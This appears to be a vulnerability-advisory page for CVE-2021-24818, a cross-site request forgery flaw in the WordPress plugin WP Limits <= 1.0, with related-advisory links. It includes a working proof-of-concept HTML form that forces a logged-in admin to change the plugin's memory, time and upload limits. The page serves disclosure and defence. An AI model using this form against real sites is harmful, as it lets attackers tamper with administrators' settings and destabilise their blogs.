Lucene search
Francesco CarlucciWPEX-ID:7CD524ED-5EB9-4D6B-B4D2-3D4BE6B57879HistoryNov 15, 2021 - 12:00 a.m.
WP Limits <= 1.0 - Plugin's Settings Update via CSRF
2021-11-1500:00:00
Francesco Carlucci
101
0.001 Low
EPSS
Percentile
26.0%
The plugin does not have CSRF check when saving its settings, allowing attacker to make a logged in admin change them, which could make the blog unstable by setting low values
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=wp_define_limits" method="POST">
<input type="hidden" name="process" value="wp_define_limits" />
<input type="hidden" name="memory_limit" value="512" />
<input type="hidden" name="process_time_limit" value="wp_define_limits" />
<input type="hidden" name="time_limit" value="100" />
<input type="hidden" name="process_upload_limit" value="wp_define_limits" />
<input type="hidden" name="upload_limit" value="512" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
wpvulndb
wpvulndb
WP Limits <= 1.0 - Plugin's Settings Update via CSRF
2021-11-15 00:00:00
cnvd
cnvd
WordPress WP Limits plugin cross-site request forgery vulnerability
2021-12-18 00:00:00
nvd
nvd
CVE-2021-24818
2021-12-13 11:15:08
cve
cve
CVE-2021-24818
2021-12-13 11:15:08
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2021-12-13 11:15:00
cvelist
cvelist
CVE-2021-24818 WP Limits <= 1.0 - Plugin's Settings Update via CSRF
2021-12-13 10:41:00